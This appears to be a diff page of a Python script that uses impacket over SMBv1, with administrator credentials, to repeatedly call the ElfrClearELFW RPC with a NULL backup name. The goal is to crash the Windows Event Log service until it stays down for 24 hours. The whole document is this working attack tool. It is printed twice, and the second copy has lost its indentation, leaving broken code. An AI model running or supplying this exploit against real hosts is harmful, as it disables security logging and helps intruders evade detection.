byt3bl33d3r · September 18, 2020 08:12
diff --git a/eventvwr_crash.py b/eventvwr_crash.py
 # Crash the Windows Event Log Service remotely, needs Admin privs
 # originally discovered by limbenjamin and accidently re-discovered by @byt3bl33d3r
 #
 # Once the service crashes 3 times it will not restart for 24 hours
 #
 # https://github.com/limbenjamin/LogServiceCrash
 # https://limbenjamin.com/articles/crash-windows-event-logging-service.html
 #
 # Needs the impacket library (https://github.com/SecureAuthCorp/impacket)

 from impacket.dcerpc.v5 import transport, even
 from impacket.smbconnection import SMBConnection, SessionError
 from impacket.smb import SMB_DIALECT
 from impacket.dcerpc.v5.dtypes import NULL

 host = "target_ip"
 username = "Administrator"
 password = "password"

 while True:
    # We're using an SMBv1 connection so you can see the un-encrypted traffic if you so desire
    conn = SMBConnection(host, host, None, 445, preferredDialect=SMB_DIALECT)
    conn.login(username, password)

    rpctransport = transport.SMBTransport(host, host, filename='/eventlog', smb_connection=conn)

    try:
        dce = rpctransport.get_dce_rpc()
        dce.connect()
        dce.bind(even.MSRPC_UUID_EVEN, transfer_syntax = ('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
    except SessionError:
        print("Event log go boom!")
        break

    try:

        resp = even.hElfrOpenELW(dce, 'Security', '')
        resp.dump()

        # Calling ElfrClearELFW with a handle from ElfrOpenELW and specifying NULL as the BackupFileName seems to be what triggers the bug
        resp = even.hElfrClearELFW(
            dce,
            resp['LogHandle'],
            NULL
        )

        resp.dump()
    except SessionError:
        pass
	# Crash the Windows Event Log Service remotely, needs Admin privs
	# originally discovered by limbenjamin and accidently re-discovered by @byt3bl33d3r
	#
	# Once the service crashes 3 times it will not restart for 24 hours
	#
	# https://github.com/limbenjamin/LogServiceCrash
	# https://limbenjamin.com/articles/crash-windows-event-logging-service.html
	#
	# Needs the impacket library (https://github.com/SecureAuthCorp/impacket)

	from impacket.dcerpc.v5 import transport, even
	from impacket.smbconnection import SMBConnection, SessionError
	from impacket.smb import SMB_DIALECT
	from impacket.dcerpc.v5.dtypes import NULL

	host = "target_ip"
	username = "Administrator"
	password = "password"

	while True:
	# We're using an SMBv1 connection so you can see the un-encrypted traffic if you so desire
	conn = SMBConnection(host, host, None, 445, preferredDialect=SMB_DIALECT)
	conn.login(username, password)

	rpctransport = transport.SMBTransport(host, host, filename='/eventlog', smb_connection=conn)

	try:
	dce = rpctransport.get_dce_rpc()
	dce.connect()
	dce.bind(even.MSRPC_UUID_EVEN, transfer_syntax = ('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
	except SessionError:
	print("Event log go boom!")
	break

	try:

	resp = even.hElfrOpenELW(dce, 'Security', '')
	resp.dump()

	# Calling ElfrClearELFW with a handle from ElfrOpenELW and specifying NULL as the BackupFileName seems to be what triggers the bug
	resp = even.hElfrClearELFW(
	dce,
	resp['LogHandle'],
	NULL
	)

	resp.dump()
	except SessionError:
	pass